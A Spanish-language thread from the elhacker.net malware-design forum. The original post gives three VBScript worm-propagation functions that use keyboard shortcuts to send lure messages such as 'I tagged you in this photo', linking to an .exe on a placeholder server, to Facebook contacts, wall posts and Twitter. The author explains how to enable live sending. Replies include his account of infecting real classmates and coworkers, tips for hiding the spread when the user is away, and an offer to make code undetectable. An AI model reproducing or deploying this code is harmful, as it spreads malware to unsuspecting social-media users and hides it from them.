elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderador: fary)
| | |-+  [VBS] [SOURCE] Facebook y Twitter Spread
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 3 Ir Abajo Respuesta Imprimir
Autor Tema: [VBS] [SOURCE] Facebook y Twitter Spread  (Leído 24,425 veces)
Mad Antrax
Colaborador
***
Desconectado Desconectado

Mensajes: 2.166


Cheats y Trainers para todos!


Ver Perfil WWW
[VBS] [SOURCE] Facebook y Twitter Spread
« en: 4 Marzo 2014, 23:26 pm »

Hola a todos

Como algunos ya habréis visto, estoy retomando mis tiempos mozos de programación. Ando liado desarrollando virus, troyanos y gusanos. Hoy vengo a compartir 3 funciones de Spread que permitirán reproducir una infección vírica usando Facebook (2 métodos) y Twitter (1 método)

El funcionamiento es muy simple. Primero de todo se tienen que dar unas circunstancias para que el "spread" sea efectivo, he realizado pruebas con usuarios reales y me he quedado asombrado con la efectividad de éste "spread". El código se aprovecha de los atajos de teclado que hay en las web's de FB y TW. Eso significa que si cambian los atajos, la función dejará de funcionar... Empecemos con la primera:

Spread usando mensajes personales de Facebook

Primero de todo, os contaré las pulsaciones que ejecuta el script para que las podáis testear en vuestro propio FB, es muy fácil:

1. Entra en www.facebook.com
2. Inicia sesión en tu perfil
3. Pulsa la combinación de teclas: ALT+M
4. Pulsa una tecla (la letra C por ejemplo)
5. Pulsa Enter y Tabulador
6. Escribe un texto y pulsa Enter

Si lo has hecho bien, verás que has enviado un mensaje a un contacto de tu lista de amigos. Pues bien, el script automatiza todas esas acciones en el PC de la víctima:

Código
  1. Set WS = CreateObject("WScript.Shell")
  2. call fb_msg_spread("holaa, te he etiquetado en esta foto http://www.servidor.com/mifoto.exe")
  3.  
  4. Function FB_MSG_Spread(X)
  5. Randomize
  6. C = Chr(Int(rnd*26)+97)
  7.  
  8. WS.run "http://www.facebook.com"
  9. WScript.Sleep 5000
  10.  
  11. WS.SendKeys "%m"
  12. WScript.Sleep 500
  13.  
  14. For i = 1 to Int(rnd*5)+2
  15. WS.SendKeys C
  16. WScript.Sleep 500
  17. WS.SendKeys "{ENTER}"
  18. Next
  19.  
  20. WScript.Sleep 500
  21. WS.SendKeys "{TAB}"
  22. WScript.Sleep 500
  23. WS.SendKeys X
  24. WScript.Sleep 500
  25. 'WS.SendKeys "{ENTER}"
  26. End Function

Copiad ese código TAL CUAL en un fichero de texto y lo guardáis como VBS. La última linea esta comentada, por lo que no os preocupéis, no se va a mandar ningún mensaje a ningún contacto vuestro.

Ahora ejecutad el fichero y mirar como se reproduce la secuencia de comandos. El script calcula una letra al azar y la utiliza para enviar el mensaje a varios contactos simultaneamente. Para utilizar éste código de forma real, quita el comentario de la última línea y ya tendrás un estupendo spread por Facebook.



Spread usando noticias del muro de Facebook

Éste metodo es parecido al anterior, pero utiliza las teclas J y C para buscar una noticia al azar y enviar el comentario:

Código
  1. Set WS = CreateObject("WScript.Shell")
  2. call fb_txt_spread("ei, creo que te han etiquetado sin tu permiso! http://www.servidor.com/lafoto.exe")
  3.  
  4. Function FB_TXT_Spread(X)
  5. Randomize
  6.  
  7. WS.run "http://www.facebook.com"
  8. WScript.Sleep 5000
  9.  
  10. For i = 1 to Int(rnd*5)+1
  11. WS.SendKeys "j"
  12. WScript.Sleep 800
  13. Next
  14.  
  15. WS.SendKeys "c"
  16. WScript.Sleep 800
  17. WS.SendKeys X
  18. WScript.Sleep 500
  19. 'WS.SendKeys "{ENTER}"
  20. WScript.Sleep 500
  21. WS.SendKeys "{TAB}"
  22. WScript.Sleep 500
  23. WS.SendKeys "{TAB}"
  24. WScript.Sleep 500
  25. WS.SendKeys "j"
  26. End Function

De igual modo que en el ejemplo anterior, podéis ejecutar éste script ya que la tecla ENTER está comentada y no hay riesgo. Para utilizar el script en un entorno real, quitad el comentario.



Spread usando un tweet en Twitter

Lo mismo que los anteriores casos, utilizando la tecla M para mandar un tweet:

Código
  1. Set WS = CreateObject("WScript.Shell")
  2. call tw_txt_spread("Acabo de publicar un album de fotos http://www.servidor.com/photo_album.exe")
  3.  
  4. Function TW_TXT_Spread(X)
  5. Randomize
  6.  
  7. WS.run "http://www.twitter.com"
  8. WScript.Sleep 6000
  9.  
  10. WS.SendKeys "n"
  11. WScript.Sleep 800
  12. WS.SendKeys X
  13. WScript.Sleep 500
  14. WS.SendKeys "{TAB}"
  15. WScript.Sleep 500
  16. 'WS.SendKeys "{ENTER}"
  17. End Function

Podéis probar el código, ya que la tecla ENTER también está comentada.





Bueno, espero que os haya gustado y que haya quedado clara mi explicación. Insisto, los script que he puesto los podéis probar en vuestro PC, ya que la línea que envía el mensaje a los contactos está deshabilitada con el comentario, así que no hay riesgo.

Saludos!! :D
« Última modificación: 5 Marzo 2014, 10:09 am por ||MadAntrax|| » En línea

No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.
noele1995

Desconectado Desconectado

Mensajes: 137



Ver Perfil
Re: [VBS] [SOURCE] Facebook y Twitter Spread
« Respuesta #1 en: 5 Marzo 2014, 00:30 am »

Buen code como siempre, ingenioso y sencillo. Ultimamente se explota mucho el potencial de vbs por lo que veo.

Saludos
En línea

Mad Antrax
Colaborador
***
Desconectado Desconectado

Mensajes: 2.166


Cheats y Trainers para todos!


Ver Perfil WWW
Re: [VBS] [SOURCE] Facebook y Twitter Spread
« Respuesta #2 en: 5 Marzo 2014, 00:36 am »

Buen code como siempre, ingenioso y sencillo. Ultimamente se explota mucho el potencial de vbs por lo que veo.

Saludos

Lo has probado? Te ha funcionado? Mañana lo probaré en otras maquinas con SO y web-browsers diferentes a ver si detecto algun bug.

Gracias! :D

PD: vbs tiene la facilidad de ser fácilmente programable y encriptable, obtienes grandes resultados con solo unos pocos bytes. Yo adoro VB6 y VBS

:D
En línea

No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.
noele1995

Desconectado Desconectado

Mensajes: 137



Ver Perfil
Re: [VBS] [SOURCE] Facebook y Twitter Spread
« Respuesta #3 en: 5 Marzo 2014, 19:58 pm »

He probado los dos de facebook Win7 con el Chrome y funcionan.Estoy impaciente por ver el cactus trojan :)
En línea

portaro


Desconectado Desconectado

Mensajes: 1.065



Ver Perfil WWW
Re: [VBS] [SOURCE] Facebook y Twitter Spread
« Respuesta #4 en: 7 Marzo 2014, 01:17 am »

Jolín hace tiempos que no veia por aqui a Antrax, puff buenos tiempos en que andaba purgando web a ver que escribiay tutos, aún esta tu página me acuerdo que no la conseguia encontrar de las ultimas veces que buscaba, aún tengo algunos pdfs de tus tutos amigo.

Todo un lujo verte de nuevo por aqui, aunque yo más bien aprendi poco eheh me pase a Linux y esas cosillas eheh.

A ver si paso más por aqui a ver si pones material. ;D (droja de la buena ehehe)
En línea


Siscu.cab

Desconectado Desconectado

Mensajes: 128



Ver Perfil
Re: [VBS] [SOURCE] Facebook y Twitter Spread
« Respuesta #5 en: 7 Marzo 2014, 06:54 am »

Waaa explicanos mas   :o
« Última modificación: 7 Marzo 2014, 06:56 am por Siscu.cab » En línea

79137913


Desconectado Desconectado

Mensajes: 1.169


4 Esquinas


Ver Perfil WWW
Re: [VBS] [SOURCE] Facebook y Twitter Spread
« Respuesta #6 en: 7 Marzo 2014, 17:19 pm »

HOLA!!!

Me parecio medio chapucero el codigo, aunque en su mayoria funcionan...

El de mensaje no funciona bien en firefox winxp.

el resto andan de diez, aunque podrias haber hecho algo mas en segundo plano.

Si queres tengo un codigo que funciona con winsocks en vbs y anda muy bien y tengo una tactica para hacer "FUD" casi cualquier codigo en VBS.

GRACIAS POR LEER!!!
En línea

"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

 79137913                          *Shadow Scouts Team*
Mad Antrax
Colaborador
***
Desconectado Desconectado

Mensajes: 2.166


Cheats y Trainers para todos!


Ver Perfil WWW
Re: [VBS] [SOURCE] Facebook y Twitter Spread
« Respuesta #7 en: 8 Marzo 2014, 16:35 pm »

HOLA!!!

Me parecio medio chapucero el codigo, aunque en su mayoria funcionan...

El de mensaje no funciona bien en firefox winxp.

el resto andan de diez, aunque podrias haber hecho algo mas en segundo plano.

Si queres tengo un codigo que funciona con winsocks en vbs y anda muy bien y tengo una tactica para hacer "FUD" casi cualquier codigo en VBS.

GRACIAS POR LEER!!!

El codigo es sencillo y "chapucero", evidentemente se puede implementar de formas más eficaces, ésto es solo una prueba de concepto. Yo le agregaría una función que compruebe las cookies locales para ver si el usuario está logeado en Facebook/Twitter y luego una función que detecte si el usuario está delante de la pantalla o no, por ejemplo comprobando la posición del Mouse a intervalos de 5 minutos, si el mouse no se mueve pues lanzar el spread para que nadie lo vea.

Insisto que lo he probado con varios usuarios del instituo y del trabajo. El gusano se expandió por la red en cuestión de horas. Tuve que eliminar el fichero de descarga para detener la infección.

Es un método un poco brusco y "chapucero", pero funciona que da miedo :D
En línea

No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.
daryo


Desconectado Desconectado

Mensajes: 1.070



Ver Perfil WWW
Re: [VBS] [SOURCE] Facebook y Twitter Spread
« Respuesta #8 en: 8 Marzo 2014, 18:35 pm »

genial  ;D , es increible que la gente sea tan ingenua de abrir las fotos.exe xD o o la foto.gif.exe
En línea

buenas
Kami

Desconectado Desconectado

Mensajes: 252


Be happy!


Ver Perfil
Re: [VBS] [SOURCE] Facebook y Twitter Spread
« Respuesta #9 en: 9 Marzo 2014, 16:01 pm »

Amores, no habéis pensado en usar la API?....

Si necesitas ayuda para hacerla... yo te ayudo...
En línea

Páginas: [1] 2 3 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Twitter y Facebook desde vb6
Programación Visual Basic
elfantasma-- 9 7,533 Último mensaje 5 Marzo 2011, 17:24 pm
por extreme69
[Source]Controlar PC desde Twitter
.NET (C#, VB.NET, ASP)
neoncyber 1 3,086 Último mensaje 21 Mayo 2011, 10:12 am
por k0ws
Twitter o Facebook
Noticias
wolfbcn 6 3,386 Último mensaje 10 Enero 2013, 21:54 pm
por Jenag
[vbs][source] spread usb
Scripting
daryo 1 3,239 Último mensaje 10 Diciembre 2014, 04:24 am
por .BrutuS
[VBS] [SOURCE] Dropbox Spread
Análisis y Diseño de Malware
.BrutuS 2 3,434 Último mensaje 9 Diciembre 2014, 22:12 pm
por .BrutuS
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines